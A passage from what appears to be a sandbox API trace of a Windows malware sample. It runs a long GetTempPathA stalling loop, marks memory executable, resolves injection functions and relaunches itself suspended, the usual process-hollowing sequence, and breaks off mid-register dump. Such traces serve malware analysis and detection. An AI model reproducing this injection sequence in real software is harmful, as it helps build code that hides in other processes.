nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.276] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.277] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.278] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.635] VirtualProtect (in: lpAddress=0x1534b8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0096.636] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0096.636] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0096.636] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0096.637] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c 
[0096.637] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0096.637] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0096.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0096.638] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0096.638] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0096.638] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0096.767] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", 
lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0xa013c [0097.602] PostMessageA (hWnd=0xa013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0097.602] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0097.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0097.602] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3a0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0097.603] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0097.603] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xbbc, dwThreadId=0xbc0)) returned 1 [0097.605] 
VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.605] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0097.605] GetThreadContext (in: hThread=0x48, lpContext=0x3a0000 | out: lpContext=0x3a0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, 
[41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, 